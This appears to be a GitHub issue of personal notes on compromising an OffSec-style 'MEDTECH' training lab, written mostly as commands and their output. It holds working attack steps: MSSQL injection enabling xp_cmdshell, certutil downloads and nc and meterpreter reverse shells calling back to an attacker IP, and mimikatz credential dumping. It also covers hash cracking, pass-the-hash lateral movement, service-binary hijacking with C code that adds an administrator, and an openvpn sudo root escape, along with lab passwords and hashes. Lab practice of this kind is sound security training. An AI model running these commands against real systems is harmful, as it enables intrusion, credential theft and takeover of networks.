Open WDavid404 opened 6 months ago
searchsploit for ruby v2.7/WEBrick/ssh v8.4/jekyll
--> No info
Access 80 port via web broswser
gobuster dir -u http://192.168.221.120 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config
/404 (Status: 200) [Size: 4328]
/about (Status: 301) [Size: 44] [--> http://192.168.221.120/about/]
/assets (Status: 301) [Size: 46] [--> http://192.168.221.120/assets/]
/index (Status: 200) [Size: 4649]
/index.html (Status: 200) [Size: 4649]
/robots.txt (Status: 200) [Size: 36]
/robots.txt (Status: 200) [Size: 36]
/sitemap.xml (Status: 200) [Size: 503]
/static (Status: 301) [Size: 46] [--> http://192.168.221.120/static/]
- gobuster dir -u http://192.168.221.120/jekyll -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config
---> No info
----------->
SSH Login:
ssh offsec@192.168.214.120 (pwd: century62hisan51)
sudo su
--> succeed to become root user!
find / -name proof.txt 2>/dev/null ---> succeed.
http://192.168.221.121/login.aspx --> SQL injection and SQL server is MSSQL
' order by 1,2,3,4,5,6 --//
====> column is 2
' UNION SELECT null,null--//
' UNION SELECT null,CURRENT_USER--//
--> No sql error ---> blind injection?
' IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';--
--> it works!
[On Kali] Prepare a nc64.exe file (https://github.com/int0x33/nc.exe/blob/master/nc64.exe) and run python3 -m http.server 80
';EXEC sp_configure 'show advanced options', 1 -- //
%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C%201%20--%20%2F%2F
';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F
';EXECUTE sp_configure 'xp_cmdshell', 1;--//
%27%3BEXECUTE%20sp_configure%20%27xp_cmdshell%27%2C%201%3B--%2F%2F
';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F
then,
';EXECUTE xp_cmdshell "certutil -urlcache -f http://192.168.45.152/nc64.exe c:/windows/temp/nc64.exe";--"
%27%3BEXECUTE%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A%2F%2F192.168.45.152%2Fnc64.exe%20c%3A%2Fwindows%2Ftemp%2Fnc64.exe%22%3B--
then,
';EXECUTE xp_cmdshell "c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.152 4444";--
%27%3BEXECUTE%20xp_cmdshell%20%22c%3A%2Fwindows%2Ftemp%2Fnc64.exe%20-e%20cmd.exe%20192.168.45.152%204444%22%3B--
==> nc listener get reverse shell from the target:
On the victim:
powershell
PS C:\TEMP> whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
iwr -uri http://192.168.45.152/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe .\PrintSpoofer64.exe -i -c powershell.exe ---> Try again...Succeed!
then, try use mimikazt certutil -urlcache -f http://192.168.45.152/mimikatz.exe c:/temp/mimikatz.exe (Note: I used iwr at first but failed..)
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
-->
* Username : joe
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* Domain : MEDTECH.COM
* Password : Flowers1
next,
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam
-->
Domain : WEB02
User : Administrator
Hash NTLM: b2c03054c306ac8fc5f9d188710b0168
User : offsec
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
Try to crack offsec's hash:
echo "2892d26cdf84d7a70e2eb3b9f05c425e" > offsec.hash
hashcat -m 1000 offsec.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
--> offsec's password is 'lab'
--> try to establish a ssh tunnel on this host. [Victim] ssh -V: ---> OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2 ssh -N -D 9999 kali@192.168.45.211 -vvv --->
debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts error:2
debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts2 error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts2 error:2
debug3: failed to open file:C:/dev/tty error:3
debug1: read_passphrase: can't open /dev/tty: No such file or directory
... ---> didn't find solution...
Try using chisel: [Kali] 下载chisel到目前目录 (https://github.com/jpillora/chisel/releases/tag/v1.9.1,下载windows amd64那个 和 linux的) 对于linux版本的chisel
kali@kali:~/beyond$ chmod a+x chisel
kali@kali:~/beyond$./chisel server -p 8000 --reverse
[Victim]
iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe
.\chisel client 192.168.45.152:8000 R:1080:socks
ok! HTTP channel is established via Chisel!
[Kali] edit '/etc/proxychains4.conf ' ==> socks5 127.0.0.1 1080 (1080 port is same as the port number in the pic above)
proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
SMB 172.16.206.10 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:MEDTECH.COM) (signing:True) (SMBv1:False)
SMB 172.16.206.83 445 CLIENT02 [*] Windows 10.0 Build 22000 x64 (name:CLIENT02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.13 445 PROD01 [*] Windows 10.0 Build 20348 x64 (name:PROD01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.12 445 DEV04 [*] Windows 10.0 Build 20348 x64 (name:DEV04) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.11 445 FILES02 [*] Windows 10.0 Build 20348 x64 (name:FILES02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.82 445 CLIENT01 [*] Windows 10.0 Build 22000 x64 (name:CLIENT01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.10 445 DC01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.83 445 CLIENT02 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.13 445 PROD01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.13 445 PROD01 [+] Enumerated shares
SMB 172.16.206.13 445 PROD01 Share Permissions Remark
SMB 172.16.206.13 445 PROD01 ----- ----------- ------
SMB 172.16.206.13 445 PROD01 ADMIN$ Remote Admin
SMB 172.16.206.13 445 PROD01 C$ Default share
SMB 172.16.206.13 445 PROD01 IPC$ READ Remote IPC
SMB 172.16.206.83 445 CLIENT02 [+] Enumerated shares
SMB 172.16.206.83 445 CLIENT02 Share Permissions Remark
SMB 172.16.206.83 445 CLIENT02 ----- ----------- ------
SMB 172.16.206.83 445 CLIENT02 ADMIN$ Remote Admin
SMB 172.16.206.83 445 CLIENT02 C READ
SMB 172.16.206.83 445 CLIENT02 C$ Default share
SMB 172.16.206.83 445 CLIENT02 IPC$ READ Remote IPC
SMB 172.16.206.83 445 CLIENT02 Windows READ
SMB 172.16.206.12 445 DEV04 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.10 445 DC01 [+] Enumerated shares
SMB 172.16.206.10 445 DC01 Share Permissions Remark
SMB 172.16.206.10 445 DC01 ----- ----------- ------
SMB 172.16.206.10 445 DC01 ADMIN$ READ Remote Admin
SMB 172.16.206.10 445 DC01 C$ READ,WRITE Default share
SMB 172.16.206.10 445 DC01 IPC$ READ Remote IPC
SMB 172.16.206.10 445 DC01 NETLOGON READ Logon server share
SMB 172.16.206.10 445 DC01 SYSVOL READ Logon server share
SMB 172.16.206.12 445 DEV04 [+] Enumerated shares
SMB 172.16.206.12 445 DEV04 Share Permissions Remark
SMB 172.16.206.12 445 DEV04 ----- ----------- ------
SMB 172.16.206.12 445 DEV04 ADMIN$ Remote Admin
SMB 172.16.206.12 445 DEV04 C$ Default share
SMB 172.16.206.12 445 DEV04 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 [+] MEDTECH.COM\joe:Flowers1 (Pwn3d!)
SMB 172.16.206.82 445 CLIENT01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.82 445 CLIENT01 [+] Enumerated shares
SMB 172.16.206.82 445 CLIENT01 Share Permissions Remark
SMB 172.16.206.82 445 CLIENT01 ----- ----------- ------
SMB 172.16.206.82 445 CLIENT01 ADMIN$ Remote Admin
SMB 172.16.206.82 445 CLIENT01 C$ Default share
SMB 172.16.206.82 445 CLIENT01 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 [+] Enumerated shares
SMB 172.16.206.11 445 FILES02 Share Permissions Remark
SMB 172.16.206.11 445 FILES02 ----- ----------- ------
SMB 172.16.206.11 445 FILES02 ADMIN$ READ,WRITE Remote Admin
SMB 172.16.206.11 445 FILES02 C READ,WRITE
SMB 172.16.206.11 445 FILES02 C$ READ,WRITE Default share
SMB 172.16.206.11 445 FILES02 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 TEMP READ,WRITE
SMB 172.16.206.10 445 DC01 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.83 445 CLIENT02 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.13 445 PROD01 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.11 445 FILES02 [+] MEDTECH.COM\joe:Flowers1 (Pwn3d!) SMB 172.16.206.82 445 CLIENT01 [+] MEDTECH.COM\joe:Flowers1
-- sudo proxychains -q xfreerdp /d:'MEDTECH.COM' /u:'joe' /p:'Flowers1' /f +fonts +clipboard /v:172.16.206.82 ---> [06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - freerdp_post_connect failed
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 -----> ^^^^^^^^^^^^^^^^^^^^^^ Succeed!
sudo proxychains nmap -sT 172.16.206.10-14 -p 22 --> 172.16.206.14 has 22 port open. ---> Try 'sudo proxychains ssh joe@172.16.206.14' but failed: permission denied.
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/joe
--> No entries found!
proxychains -q crackmapexec smb 172.16.193.10-14 172.16.193.82-83 -u offsec -d MEDTECH.COM -p "lab" --shares
-->
172.16.193.10 445 DC01 [+] MEDTECH.COM\offsec:lab
172.16.193.11 445 FILES02 [+] MEDTECH.COM\offsec:lab
172.16.193.12 445 DEV04 [+] MEDTECH.COM\offsec:lab
172.16.193.13 445 PROD01 [+] MEDTECH.COM\offsec:lab
172.16.193.83 445 CLIENT02 [+] MEDTECH.COM\offsec:lab
172.16.193.82 445 CLIENT01 [+] MEDTECH.COM\offsec:lab
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/offsec
--> No entries found!
proxychains -q nmap -sT 172.16.206.10-14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 10:26 EDT
Nmap scan report for 172.16.206.10
Host is up (0.000025s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
Nmap scan report for 172.16.206.11
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.206.12
Host is up (0.000025s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.206.13
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.206.14
Host is up (0.000024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
sudo proxychains nmap -sT 172.16.206.82-83 -o nmap_result2
Nmap scan report for 172.16.206.82
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.206.83
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Other:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No info
Get-ChildItem -Path C:\ -Include local.txt -File -Recurse -ErrorAction SilentlyContinue --> No info
net user /domain --> FAILED. because this host is not joning AD domain.
try ssh joe@192.168.211.120/122 --> failed..
cd C:\TEMP iwr -uri http://192.168.45.203/winPEASx64.exe -Outfile winPEAS.exe .\winPEAS.exe ----> no found any useful info C:\inetpub\wwwroot\assets\js\jquery.form.js: username', value: 'jresig' }, { name: 'password', value: 'secret' } ]
cd C:\TEMP wmic service get name,pathname | findstr /i /v "C:\Windows\" | findstr /i /v """ --> No useful info
iwr -uri http://192.168.45.203/SharpHound.ps1 -Outfile SharpHound.ps1 powershell -ep bypass Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\ ---> 2024-03-12T07:24:01.7181243-07:00|ERROR|Unable to connect to LDAP, verify your credentials (yes, the current user is not domain user )
cd C:\inetpub\wwwroot
web.config
... connectionString=" server=localhost\SQLEXPRESS; database=webapp; uid=sa; password=WhileChirpTuesday218; ...
$SqlConnection.ConnectionString = "Server =127.0.0.1\SQLEXPRESS; Database = webapp; User ID = sa; Password = WhileChirpTuesday218;"
select * from INFORMATION_SCHEMA.TABLES
select * from users --> no info, empty result..
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 --> login to the victim.
net user /domain
According to the following info
SMB 172.16.206.11 445 FILES02 Share Permissions Remark
SMB 172.16.206.11 445 FILES02 ----- ----------- ------
....
SMB 172.16.206.11 445 FILES02 TEMP READ,WRITE
[Kali] upload mimikatz.exe file to Victim proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
[Victim]
powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ---> No useful info...
mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ---> User : WDAGUtilityAccount Hash NTLM: 0c6ce171c9cc3afb29ca0ccc335e49bb
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
--> find local.txt, proof.txt
proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
--> No info
net group /domain
PS C:\temp> net group /domain
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
net group "Domain Admins" /domain
-->
Administrator leon
net group Domain users /domain
-->
Administrator joe krbtgt
leon mario offsec
peach wario yoshi
net group "Domain Computers" /domain
-->
CLIENT01$ CLIENT02$ DEV04$
FILES02$ PROD01$ WEB02$
[Kali] proxychains smbclient //172.16.208.11/TEMP -c 'put PowerView.ps1' --user=MEDTECH.COM/joe%Flowers1 PS Import-Module .\PowerView.ps1 PS Get-NetUser | select cn,pwdlastset,lastlogon
cn pwdlastset lastlogon
Administrator 12/5/2022 11:04:32 AM 3/15/2024 7:21:46 PM Guest 12/31/1600 4:00:00 PM 12/31/1600 4:00:00 PM offsec 9/27/2022 10:33:23 AM 12/31/1600 4:00:00 PM krbtgt 9/27/2022 10:47:41 AM 12/31/1600 4:00:00 PM leon 11/17/2022 12:36:23 PM 3/15/2024 8:49:43 PM joe 11/11/2022 2:02:39 AM 2/28/2023 5:41:40 AM peach 9/28/2022 3:51:13 AM 12/31/1600 4:00:00 PM mario 9/28/2022 3:50:46 AM 12/31/1600 4:00:00 PM wario 11/15/2022 1:43:27 AM 11/15/2022 1:43:35 AM yoshi 11/15/2022 5:25:26 AM 10/6/2022 3:44:30 AM
-----------------> No more hints now....
... ... ...
Get-ChildItem -Path C:\ -Filter "log" -Recurse -ErrorAction SilentlyContinue --> found c:\users\joe\Documents\fileMonitorBackup.log
---> PS type c:\users\joe\Documents\fileMonitorBackup.log|select-string NTLM
88934 Oct 04 11:21 Backup daisy 6872 Backup Completed. NTLM:
abf36048c1cf88f5603381c5128feb8e
88605 Oct 04 11:21 Backup toad 6872 Backup Completed. NTLM:
5be63a865b65349851c1f11a067a3068
88137 Oct 04 11:21 Backup wario 6872 Backup Completed. NTLM:
fdf36048c1cf88f5630381c5e38feb8e
87139 Oct 04 11:21 Backup goomba 6872 Backup Completed. NTLM:
8e9e1516818ce4e54247e71e71b5f436 6872 Backup Complet
Note: On kali, 'cat fileMonitorBackup.log|grep NTLM' doesn't work...
---> [On Kali] Try to crack wario\s hash
echo "fdf36048c1cf88f5630381c5e38feb8e">wario.hash
hashcat -m 1000 wario.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-->
Mushroom!
PS: when trying to crack other' hash, all failed.
[On Kali] proxychains -q crackmapexec smb 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!" --shares --> no admin host
net localgroup net localgroup "Remote desktop users" --> medtech/yoshi
[On Kali] proxychains -q crackmapexec winrm 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!" ---> WINRM 172.16.208.83 5985 172.16.208.83 [+] MEDTECH.COM\wario:Mushroom! (Pwn3d!)
proxychains -q evil-winrm -i 172.16.208.83 -u \wario -p "Mushroom!" ---------> SUCCEED!
[Kali] proxychains -q evil-winrm -i 172.16.208.83 -u wario -p "Mushroom\!"
(Don't need domain name)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\wario\Documents> ls Evil-WinRM PS C:\Users\wario\Documents> whoami medtech\wario Evil-WinRM PS C:\Users\wario\Documents>
whoami /priv ---> No 'SeImpersonatePrivilege', so can't use PrintSpoofer64.exe
Evil-WinRM PS C:\users\wario> services ---> C:\DevelopmentExecutables\auditTracker.exe ===》 we can replace it to abuse it.
Evil-WinRM PS C:\Users\wario\Documents> icacls "C:\DevelopmentExecutables\auditTracker.exe" C:\DevelopmentExecutables\auditTracker.exe Everyone:(I)(F) BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) ----> We have Read and Execute (RX) rithts.
[On Kali] Prepare a file called addwario.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net localgroup administrators wario /add");
return 0;
}
cross-compile the code on our Kali machine with mingw-64. kali@kali:~$ x86_64-w64-mingw32-gcc addwario.c -o addwario.exe
[Victim] Evil-WinRM PS C:\users\wario\Documents> upload addwario.exe . Evil-WinRM PS C:\users\wario\Documents> move C:\DevelopmentExecutables\auditTracker.exe auditTracker_bk.exe Evil-WinRM PS C:\users\wario\Documents> move .\addwario.exe C:\DevelopmentExecutables\auditTracker.exe
Evil-WinRM PS C:\users\wario\Documents> shutdown /r /t 0 --》Access denied Evil-WinRM PS C:\users\wario\Documents>sc.exe stop/start auditTracker ---> Works! wario has been add to localamini group: "Get-LocalGroupMember administrators" ---> Need to reloin again via Evil-WinRM with wario to take effective.
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
---> test.log but no useful info
net user /domain --> 83 is not in domain.
Try using mimikatz.exe Evil-WinRM PS C:\DevelopmentExecutables> upload mimikatz.exe .
------------> Suggested to use msfvenom to get direct reverse shell [Kali] msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe use metasploit multi/handler to receive reverse shell: sudo msfconsole -q [Victim] Evil-WinRM PS C:\DevelopmentExecutables> upload met.exe . Evil-WinRM PS C:\DevelopmentExecutables> .\met.exe --->metasploit listerner will get a reverse shell from the victim.
powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ----> No useful info
mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> No useful info
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No useful info.
Try to REUSE known password! 走投无路的时候试试resuse password! ---> found that yoshi uses the same password as wario!
As you are in the dark to such things during a pen test, but it is something you can try just in case. At least the likelihood of password reuse is higher than random bruteforce
proxychains -q crackmapexec smb 172.16.228.10-14 172.16.228.82-83 -u yoshi -d MEDTECH.COM -p "Mushroom!" --> SMB 172.16.228.82 445 CLIENT01 [+] MEDTECH.COM\yoshi:Mushroom! (Pwn3d!)
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:fdf36048c1cf88f5630381c5e38feb8e yoshi@172.16.228.82 --> login succeessfully!
dir c:\Users
09/29/2022 01:54 AM <DIR> .
09/29/2022 01:19 AM <DIR> Administrator
09/29/2022 01:56 AM <DIR> Administrator.MEDTECH
09/29/2022 12:08 AM <DIR> offsec
09/29/2022 01:35 AM <DIR> offsec.CLIENT01
09/29/2022 12:05 AM <DIR> Public
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
-->
C:\Users\Administrator.MEDTECH\Searches\hole.txt
PS C:\Users> cat C:\Users\Administrator.MEDTECH\Searches\hole.txt
leon:rabbit!:)
--> fake info?
Based on the result of nmap scan, 12 support RDP.
Note: crackmapexec and netexec doesn't work well for rdp protocol,
proxychains -q crackmapexec 172.16.228.12 -u users.txt -p passwords.txt --local-auth
proxychains -q crackmapexec rdp/smb 172.16.228.12 -u users.txt -p passwords.txt -d MEDTECH.COM --continue-on-success
proxychains -q NetExec rdp 172.16.214.12 -u users.txt -p passwords.txt -d MEDTECH.COM
----> No correct info! :(
So we need to manual check if we can login via RDP by ussing current username/password.
--->
proxychains -q xfreerdp /u:'yoshi' /p:'Mushroom!' /d:'MEDTECH.COM' /f +fonts +clipboard /v:172.16.214.12 /cert-ignore /drive:.,kali-share
---> RDP login succcessfully!
Found backup.exe file under 'C:\TEMP' folder.
Get-CimInstance -ClassName win32service | Select Name,State,PathName | Where-Object {$.State -like 'Running ---> No useful info.
$env:path ----> No suspicious info
C:\Users\yoshi\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt --> No info
[Kali]
prepare a met.exe: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
and use metasploit multi/handler to receive reverse shell:sudo msfconsole -q
[VIctim] Use met.exe to replace backup.exe under C:\TEMP ----> After around 10-15min, msfconsole listerner got a reverse from victim with admin right !!! ---> But, WHY?????
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
---> no useful info except proof.txt
powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ---->
mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> No useful info
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.214.10 ----> Login to DC01 successfully!
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.10 ----> Login to DC01
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
--->
C:\Users\Administrator\Desktop\credentials.txt
--->
web01: offsec/century62hisan51
Which one is 'web01'? Let's try it manually
---> [On Kali] ssh offsec@192.168.x.120/122 172.16.x.14 --> Can SSH login to 192.168.x.120 which is web01.
[On Kali] proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:)) --> No info
proxychains -q crackmapexec smb 172.16.188.10-14 -u leon-d MEDTECH.COM -p "rabbit:)" --shares
--->
SMB 172.16.188.10 445 DC01 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.12 445 DEV04 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.11 445 FILES02 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.13 445 PROD01 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.10 445 DC01 [+] Enumerated shares
SMB 172.16.188.10 445 DC01 Share Permissions Remark
SMB 172.16.188.10 445 DC01 ----- ----------- ------
SMB 172.16.188.10 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 172.16.188.10 445 DC01 C$ READ,WRITE Default share
SMB 172.16.188.10 445 DC01 IPC$ READ Remote IPC
SMB 172.16.188.10 445 DC01 NETLOGON READ,WRITE Logon server share
SMB 172.16.188.10 445 DC01 SYSVOL READ Logon server share
--->
Because the share folder 'NETLOGON' in DC01 has RW right, so we can upload mimikatz.exe from Kali to DC01:
proxychains -q smbclient //172.16.188.10/NETLOGON -c 'put mimikatz.exe' --user='MEDTECH.COM/leon%rabbit:)'
[DC01]
Get-ChildItem -Path C:\ mimikatz.exe -File -Recurse -ErrorAction SilentlyContinue
---> mimikatz.exe is located at C:\Windows\SYSVOL\domain\scripts
cp C:\Windows\SYSVOL\domain\scripts\mimikatz.exe c:\users\leon\
--->
Then,
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
----》
Username : Administrator
mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> User : Administrator Hash NTLM: 6bff4295a37d9c810ab95210a732f25a
no more useful info
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.188.10 MEDTECH.com/Administratior (PWD: denZV00Zwtpax57. ) ----> No found.
---> Next, we can also login to PROD01(172.16.x.13) : proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13 --> Login successful
Get-ChildItem -Path C:\Users -Include log,ini,.txt,.pdf,.xls,.xlsx,.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> no useful info except proof.txt
Found there is a 'output.txt' under C:\ ---> no useful info inside.
Prepare a user list containing all users found so far.
For 14:
proxychains -q hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://172.16.188.14 -v
---> No progress..
For 122: hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.188.122 ---> found it! offsec:password
ssh offsec@192.168.188.122 --> succeed. but offsec has no root priv and many command are forbidden... Based on the msg below (lshell) - You are in a limited shell. Type '?' or 'help' to get the list of allowed commands
offsec:~$ help cat cd clear echo exit help history ll lpath ls lsudo sudo
offsec:~$ sudo -l [sudo] password for offsec: Matching Defaults entries for offsec on vpn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User offsec may run the following commands on vpn: (ALL : ALL) /usr/sbin/openvpn
----》
According to ‘https://gtfobins.github.io/gtfobins/openvpn/#sudo’
sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
---》 Get root priv!
ls /home ---> found mario and it's .ssh dir
cat /etc/passwd
mario:x:1001:1001::/home/mario:/bin/sh
cat /etc/shadow
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::
----> crack it
copy mario info to Kali
┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
mario:x:1001:1001::/home/mario:/bin/sh
┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::
└─$ unshadow passwd.txt shadow.txt > unshadowed.txt
┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:1001:1001::/home/mario:/bin/sh
┌──(kali㉿kali)-[~/Downloads]
